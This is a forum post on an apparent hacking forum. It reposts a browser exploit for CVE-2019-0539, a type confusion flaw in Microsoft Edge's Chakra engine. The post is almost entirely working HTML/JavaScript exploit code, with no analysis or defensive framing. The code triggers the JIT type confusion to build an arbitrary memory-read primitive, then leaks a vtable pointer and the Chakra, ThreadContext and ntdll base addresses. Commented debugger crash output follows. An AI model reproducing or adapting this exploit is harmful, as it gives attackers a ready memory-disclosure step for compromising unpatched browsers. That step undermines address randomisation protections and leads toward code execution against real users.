Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion

 Share


cnhackteam7

Recommended Posts

<html>
<script>

/*
# Exploit Title: [getting Read permission through Type Confusion]
# Date: [date]
# Exploit Author: [Fahad Aid Alharbi]
# Vendor Homepage: [https://www.microsoft.com/en-us/]
# Version: [Chakra 1_11_4] (REQUIRED)
# Tested on: [Windows 10]
# CVE : [cve-2019-0539]
*/
/* author @0x4142 => Fahad Aid Alharbi 
 * cve-2019-0539
 * Getting Read &_^
 * date 27 Feb , 2019 

*/

var convert = new ArrayBuffer(0x100);
var u32 = new Uint32Array(convert);
var f64 = new Float64Array(convert);

var BASE = 0x100000000;

function hex(x) {
    return `0x${x.toString(16)}`
}

function bytes_to_u64(bytes) {
    return (bytes[0]+bytes[1]*0x100+bytes[2]*0x10000+bytes[3]*0x1000000
                +bytes[4]*0x100000000+bytes[5]*0x10000000000);
}

function i2f(x) {
    u32[0] = x % BASE;

    u32[1] = (x - (x % BASE)) / BASE;



    return f64[0];
}


function f2i(x) {
    f64[0] = x;
    return u32[0] + BASE * u32[1];
}


obj = {}
obj.a = 0x41;
obj.b = 0x42;
obj.c = 0x41;
obj.d = 0x42;
obj.e = 0x40;
obj.f = 0x40;
obj.g = 0x90;
obj.h = 0x90; 
obj.i = 0x90;

t = new ArrayBuffer(0x200);
newL = 0x1000;

hax = new ArrayBuffer(0x2000);
read_me = 0;


function hit_to_read(t){

    obj.h = hax; // set ta->buffer to hax
    obj.i = newL; // update target's length
    read_me = new Float64Array(t);

    return read_me;

}

  function read(r,read_me)
    {



        read_me[7] = i2f(r); // setup hax->buffer
        //hax = new ArrayBuffer(0x1000);
        return  hex(f2i(read_me[7])) 
  
    }



function cout(f){return document.write(f);}
function opt(o, c, value) {
   o.c = 1
   //o.a = "HELLO"
  // o.b = 3;
    //o.e = 1
    class A extends c {

    }

    o.a = value // will overwrite rcx , rdx , rax
    //o.b = value => chakra!Js::RecyclableObject::HasOnlyWritableDataProperties+0xe:
    //o.b = 0x42424242
    o.c = 555555
   // o.d = 4

}


function pwn() {

    for (let i = 0; i < 0x1000; i++) {
        let o = {a: 1, b: 2,c:3};
        opt(o, (function () {}), {});
    }

    let o = {a: 2222, b: 2,c:4,d:5};
    let cons = function () {};

    cons.prototype = o;
    /* line 120 
                        auxSlots *p 
    __Vfptr | type | 0x00000001234     | 0x0
    */

    opt(o, cons, obj);


    o.f = t

    read_me = hit_to_read(t);

    cout("[+] vtable pointer is " + hex(f2i(read_me[0])));
    vtable = hex(f2i(read_me[0]));

    buffer_addr = f2i(read_me[7]);

    Chakrabase = hex(vtable  - 0x59a3c0)

   cout("<br>")
   cout("[+] ChakraBase : " + Chakrabase)


    cout("<br>buffer_addr: " + read(buffer_addr + 40 , read_me))

    ThreadContext = read(Chakrabase - 0xffec5448,read_me)
    Ntdll = read(Chakrabase - 0xdd9a0000,read_me)
    cout("<br>")
    cout("[+] ThreadContext : " + ThreadContext)
    cout("<br>")
    cout("[+] Ntdl : " + Ntdll)
    
    
}

pwn();


/*

s=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
chakra!Js::SimpleDictionaryTypeHandlerBase<unsigned short,Js::PropertyRecord const * __ptr64,0>::GetPropertyFromDescriptor<0>+0x59:
00007ffc`d61f4109 4c8b14c8        mov     r10,qword ptr [rax+rcx*8] ds:00010000`41414141=????????????????





*/

/*

s=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
chakra!Js::SimpleDictionaryTypeHandlerBase<unsigned short,Js::PropertyRecord const * __ptr64,0>::GetPropertyFromDescriptor<0>+0x59:
00007ffc`d61f4109 4c8b14c8        mov     r10,qword ptr [rax+rcx*8] ds:00010000`41414141=????????????????





*/
</script></html>
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...